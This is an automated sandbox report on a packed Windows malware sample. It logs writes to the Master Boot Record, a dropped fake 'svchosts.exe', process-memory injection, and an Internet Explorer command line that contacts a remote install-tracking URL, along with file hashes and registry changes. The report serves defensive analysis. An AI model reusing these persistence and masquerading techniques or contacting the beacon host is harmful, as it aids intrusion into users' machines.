Malware Analysis Report

2025-08-05 10:49

Sample ID 241017-b79l3syhpk
Target d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
SHA256 d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
Tags
bootkit discovery persistence vmprotect
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80

Threat Level: Shows suspicious behavior

The file d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80 was found to be: Shows suspicious behavior.

Malicious Activity Summary

bootkit discovery persistence vmprotect

VMProtect packed file

Executes dropped EXE

Writes to the Master Boot Record (MBR)

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-17 01:48

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-17 01:48

Reported

2024-10-17 01:50

Platform

win7-20240903-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\windows\svchosts.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\windows\svchosts.exe C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A
File opened for modification C:\windows\svchosts.exe C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\windows\svchosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf6000000000200000000001066000000010000200000009a67834300f74b07edc4bdcf31f39b8fb0c2263fc5a329710b82634fcdaac33b000000000e800000000200002000000036cd28e5bf2c4a661ad37c7caa82364c2aa87017c9798ef600447e3b864388b420000000a95c904c7e50b776167773f03e84b4650235e906c7bc5e321db6bff60253f25a400000007d85e7129115c4c337556353b4c333b2debf976d0162f6a4f0d85ca81211dbac16325aea0a9d9a891d9ceb460a2ec4fa85cf333a84e85f13221fe35c91d4c2ba C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E4032D81-8C29-11EF-999E-E67A421F41DB} = "0" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf600000000020000000000106600000001000020000000d7fa00ffffbc4f20f3be9d5cf3eac55e2d2a2fe81c716674cfef3aede8ff022a000000000e8000000002000020000000bd56c188383c84508a8ccdb4adc2521f227acf090642b24d4b84890f5e7e347690000000d0e53a9672ebd63c0ceae2081ea9979328bf6e72b3c8ff49b9034b34caeb207a8b8f659ee42aab045fb6830c4fbc82c026e87f0411c179b8480fa327b75733e97eaca682258996b5922ec47e6d94d9af5d385050447fedcd76679f7cfd259c8f71fbec54d21e33a6fa5ab7ceafe598dd00712ace2b3a60d23e690ac2d3f0c4747b85f562eb2859b784b62f796a49a3e4400000000f09d70897a662edcd7e80dcf186b84897f740b840a969ab575c161e678e1ea738bc12e0f2938f3b83c418b61198075f0c6528aaa75607a643e4d066c98b4e24 C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "435291570" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\progra~1\Intern~1\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 907392b83620db01 C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\progra~1\Intern~1\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\progra~1\Intern~1\iexplore.exe N/A
N/A N/A C:\windows\svchosts.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2844 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\windows\svchosts.exe
PID 2844 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\windows\svchosts.exe
PID 2844 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\windows\svchosts.exe
PID 2844 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\windows\svchosts.exe
PID 2844 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\progra~1\Intern~1\iexplore.exe
PID 2844 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\progra~1\Intern~1\iexplore.exe
PID 2844 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\progra~1\Intern~1\iexplore.exe
PID 2844 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe C:\progra~1\Intern~1\iexplore.exe
PID 2812 wrote to memory of 2724 N/A C:\progra~1\Intern~1\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2812 wrote to memory of 2724 N/A C:\progra~1\Intern~1\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2812 wrote to memory of 2724 N/A C:\progra~1\Intern~1\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2812 wrote to memory of 2724 N/A C:\progra~1\Intern~1\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

C:\windows\svchosts.exe

C:\windows\svchosts.exe auto

C:\progra~1\Intern~1\iexplore.exe

C:\\progra~1\\Intern~1\\iexplore.exe http://jianqiangzhe1.com/AddSetup.asp?id=137&localID=232138804165&isqq=3

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2812 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 jianqiangzhe1.com udp
US 8.8.8.8:53 ip213.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2844-0-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2844-1-0x0000000000400000-0x0000000000431000-memory.dmp

C:\Windows\svchosts.exe

MD5 43c6fd6fc51136632b47a8672de41034
SHA1 a22897d94f9d1ef123cbb1e372a619113327c214
SHA256 d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
SHA512 f64b041b5a6afb4412496b526be0059814e4aac587764b36aa5b553ebe9d92533a162f484adc4b705853d65f59f262a91ad8888b84f6c1b7ac1099725fdd4e6a

memory/2844-11-0x00000000001C0000-0x00000000001F1000-memory.dmp

memory/2672-12-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2812-15-0x0000000003200000-0x0000000003210000-memory.dmp

memory/2844-20-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2672-21-0x0000000000320000-0x0000000000322000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabF93F.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarF9A1.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f79e56b22c0987748b6707649d0ff99
SHA1 684f7bfdaf190392d99e7b1ed4c1c8fc047cfbe0
SHA256 547895acc5577dc07b2827c5a5687e143a2dd961270778cd598fd3ff6e7feb7a
SHA512 dc2b3d06e727e5613bb3f7f6b7dd0f3f5f6550bb55da4ef05de87e264884e6304f3717fda3b694470a9e9ba8df779573189090bb5d4c622a2b0fbce31fc2a78a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c88a74151e16cd71c049eaa7c5353294
SHA1 8948b5326ed611047f88af58284966b740b9d10f
SHA256 071a496c481f70249d25c261e1a1772b6b8fb065082985f8842082901b57d991
SHA512 1487d5009a8f043456ee6ea17a56b5cf058f0ab2e27259faca664e73286b3779a38ec4b3d62a2f29a24a123b35d07ac50428fac2f6a440e4a95364cd87131fe6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8591bfb7acd9a74512dc4fa6fa5f3142
SHA1 5d06407c8f8334586759a4a84b60bac34fc987cd
SHA256 70cf0a12e6c3edcde7393624cde7c769509ad32d64c860debe7f217d3694beb4
SHA512 2b92a2d8185749ec723e5a83b6cec0e712eaf877abe119879dde1cb83c45159dc34e0c2eed6f5985cb31a21e12dc3cb5d78d84ca8df6dbe034edc570255546fc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dd0faaafa983552b9958a35b22fabf89
SHA1 4e120f3f8af0865246b48d91f4faa0e2781e53a6
SHA256 986d0595cdfe708a8490e5208654cee15beee2e9e2fb2b23485c37d2ed1d041e
SHA512 390d0f0822e5b12291d9640661633cbadbd65f9df2187dfb49707fb9a888f8d898f54d64418eee4462b7e9513ee7fbd992ab4adc95590fb7dcd03880a0f3ef58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 863540eeebd4a24ef6b46ea16e84c377
SHA1 cdaf1cede948118fb912ee8114f90b5398b060e9
SHA256 3ea0d3198760262a1096a772016a77717ea0901ced5efb0fabca7cc1b63a16cd
SHA512 f3905cb680f43518ffd171d0d4d33f0b221ea55144300b2c1b7231f0b57673bb91a3b4f0549faee803b2e3beb2fca1ce0a00ca7f4c33b2a3898ab69e7f4f19ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 36c2a0e0f79b15745d837edcb876ca1f
SHA1 f61d6dc9edb1c82fea1030256e89d965bbb295bf
SHA256 f41309a12612c4ff403e718ad8766acb3d9be5316e350a93450415f2a7b88df1
SHA512 1a667f3cb0a7df6a63bcfce659311cbbc274c08ea6dcc6e988efd6e5f0c30d6368e5d781661b21838f65d0130b40b2ccd63a9150118e0856c084724510982538

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f6587acdcc479b859b83e84e38dec6a
SHA1 caa5bf7409caaf89fcd3a5921784c86c7200f60e
SHA256 ac4807a63df04a78e3af350d02a0c090439d1ed66ec92f1c5dc563e770ab6d93
SHA512 5c568b17fc3794de729fe63e546ae3780233155cec5c5bbf8969aec0897205d64c3a576b8a59b7374640b8a197eca4134107086ca694d441438afeb00d66a3ea

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 98c4c46c149ab4c45203beedd151bc45
SHA1 cfc2e5832ce2f3708b9ee9e437961dd78afb3c99
SHA256 ea37c828efae6c5ccee563145ed5b6be61e488176c2560422ad059b871d709f6
SHA512 3be675b13f23cc78b0266611bdd55033e46fdb73cc3318b980a80a9ea822c2df06464739454a89f50c61da2039ddc62d44dfbf4981897f5d981e7e820a855d31

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8168def6641ec09741fb7fdd9ce754f0
SHA1 2ccada6abeb00a14febd23ec3cb0c7b5f7842632
SHA256 78a67b704194ad9827369907930320bdd74b9948bf7dc5f1a0ae6fc8ff3141cc
SHA512 41ae205699764d0331b8ece9b0fab281e1eb1ff69c7a016b6e8dba0123c63e7a552aeb82a547b3411fc479c1d0ad5eebb6e5b45495ce77465044e61d30b19ddc

memory/2672-450-0x0000000000400000-0x0000000000431000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e2599cd85e9b6211afa8be29f04a2820
SHA1 8988eb07b6f0c040f3533e38ba967bde5092b207
SHA256 e5073ecfcd88368d819179e210630dd0635549ba9bfa2e5e6d83d445e57877ef
SHA512 e821fc737d3fb17e62748a2ba36b2f8399d78b45ce6136b4e1645394f3d3fbf7d215267a10185158ad36c7a64044924762ab1b64cf5a61edbad7d55a34f7847a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 affbb1a670f0b1e795e882dc7ebda2a5
SHA1 a651114465e21c43c37491b08f10ef8dfbe401f7
SHA256 f7434f0b34f632d4ea64a9aff751fec10f73468e766d94255301ffe91276001b
SHA512 519ba8b5d44f1d286de2e5019271670ef614ef595618f11f3cae261418fc3677387fafa001c472ffd1e962fc4ad0489479c10348cfc172bf44ecb08d5ec826a3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0fbe089e0f60d37edbc8bac72d3c864f
SHA1 6e31d9c63748cd20a3bc95fc779e4a6256b5c9b4
SHA256 d041d8a06fc5c41a5ffb516a3a7cb5947a5317f8e9ff797deb4078f1dc54d258
SHA512 e150e77b04d17fb7e2ccccabb9a08f3eacc5f4903b20178d454f9f8ed8d094de24817b8e679de898ca0bb25e93441ad417ca1104cf32022768e106906025fdeb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 98cdb8289787d7c109ace76e86d8abfe
SHA1 a4eca105bcf37a3583f21cce5e9052fe707dc168
SHA256 9fadb74e08a0354a5f9eb524c63b97b3e9db29c726511bc69714adb89452a6d9
SHA512 cc0c22eabfb9954bcec943fe66fbd6b38d5174f1ee2440f2c60b2f3841c3b89776d7d2c32355b69a35468e30909b0ead148b88d5a00ecf2d0547bf74d7b1e114

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab85ee73c19d2a476a0dfc8afe9b1451
SHA1 45225162bda702e40957dc3824c61460f72bde75
SHA256 de74b91ee9c9d0bf253ea5b892b9ddd6a98e3950d28a69a09802329fac9124b1
SHA512 dc9f64bcc335f49ed15515bc29dd6295962ae8d654a75ae54f242832e2358aefe1fc075440dfe2b8ea90d287fc97f64f712945a1d8004ce6370850f325b94958

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 770283ce670ffc6524a74876c4eb22b8
SHA1 c5105143c65dea1661f03ab23a424ed7553e2b04
SHA256 429c60203c6120e195c88d7531161c87f57ab5e038937815955a3015a6ff3e8e
SHA512 fbfd15ff937213b0f519299a8385d89f22fc2e43fab1e369558ae8458b1310c8af6d83e5a0d5a267fa3a6462a4ffa193257421a0420d6f966108872bd476ed35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0ce5f6bae519dc3a2e31b87437cb269f
SHA1 c436309010b605e858aebc36277104246e89476c
SHA256 fe8887f60a677201a923fb8f950db1ecac35cabb0beedf399e38e05ada4cc038
SHA512 0fc74e047629c107b83a333f39490f65c428793429c2cd58a459ab2060a904f63865f1924bda5f5b1f012890b0f1a3a459162a4641763ed09eed5a6f34c7b32a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a52cf5fcd2caa3920172fa6570992c3f
SHA1 b36002b33b6944b39e5b01a8d08ace5be563d7eb
SHA256 7ae39795746aab4a33176f55c55d54b1899c7d1959cba08cdd8d3a9dcb632059
SHA512 e0acd39b007e6f5d2389513e76b83fa113602358e084623ee190f062a428b3fae88a39f17686f29a33ea291ae2d91db8b8175fe444941041ed380d3f6e269570

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 54630075ba50dfc2b2ee9990ac6e6abe
SHA1 7414d0ededc50174e05ed4f766cf55c260d50813
SHA256 87ac21d81143cb4a9d2dccf6ab0a9ac39476528dd4371364b6af2f3dc7f25f84
SHA512 900493c73eac8f31a57728b8ac0d1b47edb17bd31d943c59bce56bd83d816e4d2833a0df5a1f67c32af2c90449297ea3a62024952c59c5fb39f30c298cb5f67a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 26814d8d9aa0b6d2f2b0157111e5d8be
SHA1 dce35cbd572c760c9d2f67366b165a06819679d0
SHA256 5cd2bbd4010ccdcb6675a27fe77d8ab54b94c19a4ab4d1d8f9ce98de295d9f2f
SHA512 7e8fe1377aab38cb4a86de362df74c3a9b03638bc7c327b56d19d0ac7c2195996b88d96cc4789147e24b15988b36ae83973fe4674a32f0e5768a9f449fb70112

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-17 01:48

Reported

2024-10-17 01:50

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\windows\svchosts.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\windows\svchosts.exe C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A
File opened for modification C:\windows\svchosts.exe C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\windows\svchosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3157588233" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e39000000000200000000001066000000010000200000009c70f54014405554453b5242b3a64bc47e3eeefe044527e2510319099c68afcf000000000e8000000002000020000000a47534c45056f5f8c743e9995f0bfa5e1cd92ea780ba73829b0bb4539042bf7a200000000d95bc7125e4f6aea8da9cde04108d4dc1c311903889cc01f7dd83c6a504c257400000001cc70d6480c23e56d091a56271883bdeec06da0ff40d9e272bc281c4e25a97a9aac979852908da211ede71c502ce70e2f2653837a8db42b55e8c888dce50e7e8 C:\progra~1\Intern~1\iexplore.exe N/A
